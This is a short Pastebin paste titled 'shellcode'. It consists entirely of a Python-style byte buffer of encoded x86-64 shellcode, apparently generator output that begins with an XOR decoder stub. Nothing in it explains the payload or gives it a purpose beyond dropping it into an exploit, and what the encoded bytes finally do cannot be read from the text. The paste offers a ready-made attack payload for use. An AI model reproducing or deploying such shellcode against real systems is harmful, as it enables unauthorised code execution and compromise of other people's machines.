Advertisement
Guest User

shellcode

a guest
Apr 20th, 2018
55
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.61 KB | None | 0 0
  1. buf = ""
  2. buf += "\x48\x31\xc9\x48\x81\xe9\xf5\xff\xff\xff\x48\x8d\x05"
  3. buf += "\xef\xff\xff\xff\x48\xbb\x28\x5d\x62\x98\x41\x34\x67"
  4. buf += "\x36\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
  5. buf += "\x42\x74\x3a\x01\x2b\x36\x38\x5c\x29\x03\x6d\x9d\x09"
  6. buf += "\xa3\x35\xf1\x2c\x79\x60\x98\x50\x68\x2f\xbf\xce\x37"
  7. buf += "\x72\xc2\x2b\x05\x3f\x39\x2d\x37\x50\xc0\x4e\x31\x2f"
  8. buf += "\x07\xde\x37\x49\xc0\x4e\x31\x2f\xa1\x42\x5e\x3c\xd0"
  9. buf += "\xbe\xfa\x0d\x17\x70\x52\x67\xed\xb7\x5e\x5c\x6e\xb1"
  10. buf += "\x15\xd9\xb7\x23\x5d\x09\x19\x5b\x35\x62\xcb\x09\xbd"
  11. buf += "\x80\x64\x7f\x15\xeb\x7e\x4e\x31\x67\x36"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement